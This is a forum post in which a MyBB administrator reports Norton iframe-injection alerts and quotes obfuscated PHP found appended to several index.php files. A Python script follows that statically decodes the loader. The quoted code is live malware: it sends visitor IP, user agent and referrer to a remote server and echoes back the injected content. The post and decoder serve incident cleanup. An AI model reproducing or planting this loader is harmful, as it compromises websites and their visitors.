2011-10-17, 08:26 PM
So a few users have been complaining that Norton was throwing alerts when they would log in to the forum. One guy actually remembered to save the alert and post it up so I could see what it said, and here's what we have:
"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."
Anyhow, while running the file verification tool, I noticed that all of the index.php files within MyBB had the following PHP code added to the very bottom of the file:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
That code was added to the following files:
/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php
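
Added example, not part of the original post: a static decoder for the loader quoted above, which unwraps both base64 layers and the strtr() character remap without executing any PHP, so the tracking script's URL assignment can be read safely. The function names and the defang helper are this example's own; SAMPLE is the loader fragment copied from the post.

```python
import base64
import re

# Loader shape from the post: $_X='<b64 payload>';eval(base64_decode('<b64 stub>'))
LOADER_RE = re.compile(
    r"\$_X='([A-Za-z0-9+/=]+)';\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
# The decoded stub remaps characters with strtr($_X,'from','to')
STRTR_RE = re.compile(r"strtr\(\$_X,'([^']*)','([^']*)'\)")

# Loader fragment copied from the post (the part before "$ua = ...")
SAMPLE = (
    "<?php $_F=__FILE__;$_X='"
    "Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+"
    "';eval(base64_decode('"
    "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3Vp"
    "ZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCIn"
    "Ii4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="
    "'));"
)


def decode_loader(php_source):
    """Statically unwrap the loader; nothing is evaluated.

    Returns (stub, payload), or None when the loader pattern is absent.
    """
    m = LOADER_RE.search(php_source)
    if not m:
        return None
    payload = base64.b64decode(m.group(1)).decode("latin-1")
    stub = base64.b64decode(m.group(2)).decode("latin-1")
    t = STRTR_RE.search(stub)
    if t and len(t.group(1)) == len(t.group(2)):
        # Same per-character substitution PHP's strtr() performs
        payload = payload.translate(str.maketrans(t.group(1), t.group(2)))
    return stub, payload


def defang(text):
    """Make the URL non-clickable before pasting it into a ticket."""
    return text.replace("http://", "hxxp://")


if __name__ == "__main__":
    stub, payload = decode_loader(SAMPLE)
    print("stub:   ", stub)
    print("payload:", defang(payload))
```

The decoded payload is the `$url` assignment that the trailing `file_get_contents($url)` call in the injected line relies on; the same regex can be run over every .php file in the forum tree to list the infected ones.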